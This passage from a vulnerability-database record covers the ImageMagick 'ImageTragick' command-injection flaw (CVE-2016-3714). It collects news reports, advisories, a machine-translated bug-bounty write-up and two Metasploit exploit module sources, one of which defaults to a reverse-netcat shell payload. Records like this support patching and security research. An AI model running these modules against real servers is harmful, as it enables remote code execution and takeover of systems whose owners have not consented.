(input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection.\n> \n> The most dangerous part is ImageMagick supports several formats like svg, mvg, maybe some others\u2014which allow to include external files from any supported protocol including delegates. As a result, any service, which uses ImageMagick to process user supplied images and uses default delegates.xml / policy.xml, may be vulnerable to this issue.\u201d\n", "modified": "2016-05-10T12:37:34", "published": "2016-05-04T12:17:05", "id": "THREATPOST:0FADDF3632693BA6B864F1A3FB8D7EF9", "href": "https://threatpost.com/public-exploits-available-for-imagemagick-vulnerabilities/117835/", "type": "threatpost", "title": "Public Exploits Available for ImageMagick Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-02T22:33:20", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "UPDATE\n\nSearch engine optimization and analytics firm SEMrush patched a remote code execution vulnerability that allowed an attacker to send a malicious image to its service and generate a reverse shell, a typical first stage in a cyberattack. [Public disclosure of the vulnerability](<https://hackerone.com/reports/403417>) was Monday when details of the bug were shared by a white hat hacker who boasted he had earned a bounty of $10,000 for the discovery.\n\nThe RCE bug was tied to SEMrush\u2019s Report Builder feature that allows users to generate custom web analytics reports using their own branding. The problem was how SEMrush handled logo images uploaded to the platform and the use of an unpatched version of ImageMagick, a web service used to process images.\n\nSEMrush said the impact was limited to an isolated portion of its main platform. \u201cThis bug affected a specific microservice responsible for generating reports,\u201d a company spokesperson said. \u201cThe attacker, even in the event of a successful attack on the server, under no circumstances can access the entire platform.\u201d\n\nAccording to Frans Ros\u00e9n who is credited with finding the bug via the HackerOne bug bounty platform:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/25182745/SEMrush-Screen_Shot.png>)\u201cThe Logo upload in the report constructor is passed through a not properly patched version of ImageMagick. You can use Postscript to get Ghostscript to run which in return allows to trigger arbitrary commands on the server, leading to Remote Code Execution.\u201d\n\nSEMrush said the window of vulnerability was only a few days. \u201cWe would also like to mention that our platform is WAF (Web Application Firewall) secured which proactively protects our platform from attacks but a few days before report we turned it to monitoring mode to mitigate some false positive alert, that was why Frans Ros\u00e9n got the opportunity to successfully exploit the issue,\u201d the company said.\n\nWhile public disclosure of the bug was Monday, SEMrush said the bug was originally reported in August of 2018 and fixed within an hour of it being reported. It said there is no evidence the vulnerability was ever exploited by a malicious actor.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/25182910/image-tragick-logo-medium.png>)The researcher tied the ImageMagick vulnerability to a second Ghostscript flaw that could allow attackers to take remote control of systems. Ghostscript is a widely used interpreter for Adobe PostScript and PDF page description languages. [Last year](<https://threatpost.com/unpatched-ghostscript-flaws-allow-remote-takeover-of-systems/136800/>), Tavis Ormandy, a vulnerability researcher at Google\u2019s Project Zero security team, discovered a Ghostscript bug and that it could allow attackers to remotely take control of a vulnerable system.\n\n\u201cGhostscript contains an optional -dSAFER option, which is supposed to prevent unsafe PostScript operations. Multiple PostScript operations bypass the protections provided by -dSAFER, which can allow an attacker to execute arbitrary commands with arbitrary arguments,\u201d wrote the [U.S. Computer Emergency Readiness Team](<https://www.kb.cert.org/vuls/id/332928/>). \u201cThis vulnerability can also be exploited in applications that leverage Ghostscript, such as ImageMagick, GraphicsMagick, evince, Okular, Nautilus, and others.\u201d\n\nFixes for Ghostscript were deployed in August 2018.\n\nResearcher [Ros\u00e9n](<https://twitter.com/fransrosen>) did not return a request for comment.\n\nMitigation advice from the researcher at the time to SEMrush was to \u201curgently make sure your policy.xml for imagemagick ONLY allows gif, jpg, png and nothing else.\u201d\n\n_(This story was updated on 8 a.m. EDT 2/24 with a comment from SEMrush)_\n", "modified": "2019-06-25T22:47:50", "published": "2019-06-25T22:47:50", "id": "THREATPOST:5A0AA7B5B7C5F0F1DCB3F0240A055C3F", "href": "https://threatpost.com/semrush-plugs-remote-code-execution-bug-in-its-saas-platform/146003/", "type": "threatpost", "title": "SEMrush Plugs Remote Code Execution Bug in Its SaaS Platform", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:58", "description": "", "published": "2016-05-06T00:00:00", "type": "packetstorm", "title": "ImageMagick Delegate Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714"], "modified": "2016-05-06T00:00:00", "id": "PACKETSTORM:136931", "href": "https://packetstormsecurity.com/files/136931/ImageMagick-Delegate-Arbitrary-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ImageMagick Delegate Arbitrary Command Execution', \n'Description' => %q{ \nThis module exploits a shell command injection in the way \"delegates\" \n(commands for converting files) are processed in ImageMagick versions \n<= 7.0.1-0 and <= 6.9.3-9 (legacy). \n \nSince ImageMagick uses file magic to detect file format, you can create \na .png (for example) which is actually a crafted SVG (for example) that \ntriggers the command injection. \n \nTested on Linux, BSD, and OS X. You'll want to choose your payload \ncarefully due to portability concerns. Use cmd/unix/generic if need be. \n}, \n'Author' => [ \n'stewie', # Vulnerability discovery \n'Nikolay Ermishkin', # Vulnerability discovery \n'wvu', # Metasploit module \n'hdm' # Metasploit module \n], \n'References' => [ \n%w{CVE 2016-3714}, \n%w{URL https://imagetragick.com/}, \n%w{URL http://seclists.org/oss-sec/2016/q2/205}, \n%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab}, \n%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456} \n], \n'DisclosureDate' => 'May 3 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => false, \n'Payload' => { \n'BadChars' => \"\\x22\\x27\\x5c\", # \", ', and \\ \n'Compat' => { \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic netcat bash-tcp' \n} \n}, \n'Targets' => [ \n['SVG file', template: 'msf.svg'], # convert msf.png msf.svg \n['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg \n['MIFF file', template: 'msf.miff'] # convert -label \"\" msf.svg msf.miff \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat', \n'LHOST' => Rex::Socket.source_address, \n'DisablePayloadHandler' => false, \n'WfsDelay' => 9001 \n} \n)) \n \nregister_options([ \nOptString.new('FILENAME', [true, 'Output file', 'msf.png']) \n]) \nend \n \ndef exploit \nif target.name == 'SVG file' \np = Rex::Text.html_encode(payload.encoded) \nelse \np = payload.encoded \nend \n \nfile_create(template.sub('echo vulnerable', p)) \nend \n \ndef template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template] \n)) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136931/imagemagick_delegate.rb.txt"}], "archlinux": [{"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714"], "description": "It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed by\nan application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.", "modified": "2016-05-05T00:00:00", "published": "2016-05-05T00:00:00", "id": "ASA-201605-6", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000613.html", "type": "archlinux", "title": "imagemagick: arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:18", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "[](<https://1.bp.blogspot.com/--eWNPZGZC2A/VynHhjkFL3I/AAAAAAAAn88/s9rSTN6ePHkOTToGzkErHlg36uu3gPOsACLcB/s1600/ImageMagick-exploit-hack.png>)\n\nA serious zero-day vulnerability has been discovered in** ImageMagick**, a widely popular software tool used by a large number of websites to process user's photos, which could allow hackers to execute malicious code remotely on servers. \n \nImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images. \n \nThe ImageMagick tool is supported by many programming languages, including Perl, C++, PHP, Python, Ruby and is being deployed by Millions of websites, blogs, social media platforms, and popular content management systems (CMS) such as WordPress and Drupal. \n \nSlack security engineer Ryan Huber disclosed a **zero-day flaw (CVE-2016\u20133714)** in the ImageMagick image processing library that allows a hacker to execute malicious code on a Web server by uploading maliciously-crafted image. \n \nFor example, by uploading a booby-trapped selfie to a web service that uses ImageMagick, an attacker can execute malicious code on the website's server and steal critical information, snoop on user's accounts and much more. \n \nIn other words, only those websites are vulnerable that make use of ImageMagick and allow their users to upload images. \n \nThe exploit for the vulnerability has been released and named: [ImageTragick](<https://github.com/ImageTragick/PoCs>). \n\n\n> \"The exploit for this vulnerability is being used in the wild,\" Huber wrote in a blog post [published](<https://medium.com/@rhuber/imagemagick-is-on-fire-cve-2016-3714-379faf762247#.a4sx18wso>) Tuesday. \"The exploit is trivial, so we expect it to be available within hours of this post.\"\n\n> He added \"We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software.\"\n\nThe ImageMagick team has also acknowledged the flaw, [saying](<https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588>) the recent_ \"vulnerability reports \u2026 include possible Remote Code Execution and ability to render files on the local system.\" _ \n \nThough the team has not rolled out any security patches, it recommended that website administrators should add several lines of code to configuration files in order to block attacks, at least via the possible exploits. \n \nWeb administrators are also recommended to check the '**magic bytes**' in files sent to ImageMagick before allowing the image files to be processed on their end. \n \nMagic bytes are the first few bytes of a file used to identify the image type, such as GIF, JPEG, PNG. \n \nThe vulnerability will be patched in versions 7.0.1-1 and 6.9.3-10 of ImageMagick, which are due to be released by the weekend.\n", "modified": "2016-05-04T10:01:59", "published": "2016-05-03T22:59:00", "id": "THN:76D72EEDBF0F154F1633FE307178F974", "href": "https://thehackernews.com/2016/05/imagemagick-exploit-hack.html", "type": "thn", "title": "Warning \u2014 Widely Popular ImageMagick Tool Vulnerable to Remote Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-06-06T11:17:31", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "edition": 1, "description": "One, Foreword \nTime to get back to 5 May 20, the night before that, I spent several days time to study the Yahoo Messenger app, still can't figure out how it works, but annoying headache and neck pain and looking for me. So I decided to go for a walk, find a new target. Then I noticed a very interesting thing, and that is named Sean one of the researchers participating in the Yahoo Bug reward program, because the test behavior beyond Yahoo's permit boundaries and is blacklisted. \nBack inside later, I and friends Thomas\uff08dawgyg do a lot of exchanges, we agreed that you can then look at Sean being blacklisted before the test of that application. \nSecond, step 1: reconnaissance step on the point \nSean's goal is to be the Yahoo acquisition of some subsidiaries, in which he wrote that paper, these companies the use of domain name comprising: \n*. mediagroupone.de \n*. snacktv.de \n*. vertical-network.de \n*. vertical-n.de \n*. fabalista.com \nAlthough the above there are quite a few domain names, but in Sean's report, is aimed primarily at SnackTV content management system. Me and Thomas decided to repeat the Sean method used, and to SnackTV the www site as the goal, the reason for doing this is that Thomas has in this site took some time, but also to find some[XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)comfortably vulnerability. This site with other sites are different, the reason there are two points: \uff081\uff09This is a German company, \uff082\uff09This is for video producers ready to the developer's website, not as an ordinary Yahoo user. \n! [](/Article/UploadPic/2017-6/20176618118591. png? www. myhack58. com) \nThe figure above is SnackTV the search page. Obviously this is a video site, but the user must be registered through the Administrator Manual review, so we cannot directly visit the website of the upload panel. \nDue to Thomas being busy with automated scanning this website, I took some time to develop with this application feel that certain things abnormal reaction of the base is usually to be able to understand their normal reaction is. \nThree, step two: scan \nIn the mining the application of the vulnerability, me and Thomas are doing is running with this particular application related to the background tasks. I used the\u201csubbrute\u201dand\u201cdirsearch\u201dboth passive identification script, object\uff081\uff09Tap directly vulnerability and\uff082\uff09to detect the possible presence of vulnerabilities. Understand how to use these tools can help penetration testers to tap vulnerability. \nIt took a long time to run these tools, we harvest a lot of output, but our help is not large. These output information in the most is the standard error message, such as access to\u201c. htpasswd\u201doccurs when an HTTP 403 error, the\u201cadmin\u201dpage can not be accessed directly be redirected to the login page. However, the use of\u201cdirsearch\u201dscript after a lot of a list of keywords after the match, and ultimately we did harvest a vulnerable point. \nThere is a problem of a file named\u201cgetImg.php\u201dthe file is located in\u201cimged\u201ddirectory http://snacktv.de/imged/getImg.php in. After some search, we found through Google search\u201csite:snacktv.de filetype:php\u201dcan the public access this file. This step is very important, because the presence of the vulnerability of this file need a GET parameter to return content. We may need to spend weeks of time to brute force or guess the correct GET parameters, I guess no one is willing to do so, because these parameters usually requires with the addition of a parameter fit to perform the correct query request. \nGET parameters of a typical logic process flow is as follows: \n1, access\u201chttp://example.com/supersecretdevblog.php\u201d: return HTTP 500 Internal Server error, indicating that we must provide a parameter to see the content. \n2, the access\u201chttp://example.com/supersecretdevblog.php?page=index&post=1\u201d: returns HTTP 200 response, indicating that the parameters are correct, it is possible to return sensitive information. \nSo far, we know information including: \n1, The\u201cgetImage.php\u201dfiles require multiple HTTP GET parameters, if we by\u201cimgurl\u201dparameter to provide an image of the link address, then this file will be based on this address automatically download a modified picture. \n2, According to Google search exposure parameters, we know the file with ImageMagick crop function related. \nFourth, step 3: vulnerability access and logic escape limited \nWhen digging out these information, we think the first point is the\u201cImageTragick\u201dVulnerability, CVE-2016-3714, we decided to send a few test loads to try. \nMe and Thomas spent a couple of hours of time, the structure contains a vulnerability load the image file. Exploit the principle is the use of the hotspot image file that contains the load image files, the server use the \u201cImageMagick\u201dcommand-line tool to process this image file, because this tool filter is not strict, resulting in the process in the presence of arbitrary command execution vulnerability. However our load is not a success, which makes us a bit discouraged\u3002 We doubt whether they have for this load file the patch. \nWe sent to the server, load the sample as shown below. Picture address using our private domain name, it will load uploaded to the server, we pass the\u201cimageurl\u201dparameter to get the server load on the pictures. Our goal is to make the server execute an arbitrary command. Please note that where\u201cxlink:href\u201dis pointing to the picture address. \nIn addition to the server in the processed file belongs URL address on a bit of a strange outside, everything is normal. We send to the server some random text file, the server returns the data always associated with the previous call of the same. We carefully read the\u201cImageMagick\u201drelevant information, combined with the vulnerability to disclose the details, we find that the server does not seem to exist for this vulnerability, it is possible the server does not use ImageMagick to. We defer the attack this file, decided to look at the site whether there is other vulnerabilities. \nAt approximately 3:30 AM, we found several stored cross site scripting vulnerability, HTTP 401 response to injection vulnerabilities as well as common mismanagement issues, but these are not critical issues. When you participate in bug reward program, especially for a sub-company for test, these issues of bonus typically will be substantially diminished, because the impact of these problems is very low. In some people's eyes, get discount bonus can still accept, but for others it's just a waste of time. To be acquired subsidiary is the target of the unique benefits that many people in these target will relax security vigilance. \nBack to the URL address, I get a little irritable, began to suspect the server when processing the picture files of the specific implementation. If Yahoo is not the picture as a whole to deal with, instead of using the URL is injected into the XML in the\u201cimage xlink:href\u201din the processing way, this way with vulnerability PoC in a similar situation. Then I need to try what kind of load in order to verify my guess? \nI'm in the browser's address attach an additional double quote, and then saw some interesting output as follows: \n\n\n**[1] [[2]](<86777_2.htm>) [next](<86777_2.htm>)**\n", "modified": "2017-06-06T00:00:00", "published": "2017-06-06T00:00:00", "id": "MYHACK58:62201786777", "href": "http://www.myhack58.com/Article/html/3/62/2017/86777.htm", "title": "How to pass the command injection vulnerability fix Yahoo subsidiary production servers-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-03T20:00:47", "description": "This module exploits a shell command injection in the way \"delegates\" (commands for converting files) are processed in ImageMagick versions <= 7.0.1-0 and <= 6.9.3-9 (legacy). Since ImageMagick uses file magic to detect file format, you can create a .png (for example) which is actually a crafted SVG (for example) that triggers the command injection. The PostScript (PS) target leverages a Ghostscript -dSAFER bypass (discovered by taviso) to achieve RCE in the Ghostscript delegate. Ghostscript versions 9.18 and later are affected. This target is provided as is and will not be updated to track additional vulns. If USE_POPEN is set to true, a |-prefixed command will be used for the exploit. No delegates are involved in this exploitation.\n", "published": "2016-05-05T19:18:42", "type": "metasploit", "title": "ImageMagick Delegate Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714", "CVE-2016-7976"], "modified": "2019-04-24T16:34:42", "id": "MSF:EXPLOIT/UNIX/FILEFORMAT/IMAGEMAGICK_DELEGATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ImageMagick Delegate Arbitrary Command Execution',\n 'Description' => %q{\n This module exploits a shell command injection in the way \"delegates\"\n (commands for converting files) are processed in ImageMagick versions\n <= 7.0.1-0 and <= 6.9.3-9 (legacy).\n\n Since ImageMagick uses file magic to detect file format, you can create\n a .png (for example) which is actually a crafted SVG (for example) that\n triggers the command injection.\n\n The PostScript (PS) target leverages a Ghostscript -dSAFER bypass\n (discovered by taviso) to achieve RCE in the Ghostscript delegate.\n Ghostscript versions 9.18 and later are affected. This target is\n provided as is and will not be updated to track additional vulns.\n\n If USE_POPEN is set to true, a |-prefixed command will be used for the\n exploit. No delegates are involved in this exploitation.\n },\n 'Author' => [\n 'stewie', # Vulnerability discovery\n 'Nikolay Ermishkin', # Vulnerability discovery\n 'Tavis Ormandy', # Vulnerability discovery\n 'wvu', # Metasploit module\n 'hdm' # Metasploit module\n ],\n 'References' => [\n %w{CVE 2016-3714},\n %w{CVE 2016-7976},\n %w{URL https://imagetragick.com/},\n %w{URL https://seclists.org/oss-sec/2016/q2/205},\n %w{URL https://seclists.org/oss-sec/2016/q3/682},\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},\n %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}\n ],\n 'DisclosureDate' => '2016-05-03',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'BadChars' => \"\\x22\\x27\\x5c\" # \", ', and \\\n },\n 'Targets' => [\n ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg\n ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg\n ['PS file', template: 'msf.ps'] # PoC from taviso\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['ImageTragick'],\n 'RelatedModules' => [\n 'exploit/unix/fileformat/ghostscript_type_confusion',\n 'exploit/multi/fileformat/ghostscript_failed_restore'\n ]\n }\n ))\n\n register_options([\n OptString.new('FILENAME', [true, 'Output file', 'msf.png']),\n OptBool.new('USE_POPEN', [false, 'Use popen() vector', true])\n ])\n end\n\n def exploit\n if target.name == 'SVG file'\n p = Rex::Text.html_encode(payload.encoded)\n else\n p = payload.encoded\n end\n\n file_create(template.sub('echo vulnerable > /dev/tty', p))\n end\n\n def template\n if datastore['USE_POPEN']\n t = 'popen'\n else\n t = 'delegate'\n end\n\n begin\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'imagemagick', t,\n target[:template]\n ))\n rescue Errno::ENOENT\n fail_with(Failure::NoTarget, \"Target has no #{t} support\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/fileformat/imagemagick_delegate.rb"}], "hackerone": [{"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 7500.0, "cvelist": [], "description": "The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka \"ImageTragick.\" \n\nSee also: \nhttp://www.openwall.com/lists/oss-security/2016/05/03/18 \nhttps://imagetragick.com/\n", "modified": "2016-05-03T00:00:00", "published": "2016-04-21T00:00:00", "id": "H1:143966", "href": "https://hackerone.com/reports/143966", "type": "hackerone", "title": "The Internet: Insufficient shell characters filtering leads to (potentially remote) code execution (CVE-2016-3714)", "cvss": {"score": 0.0, "vector": "NONE"}}]}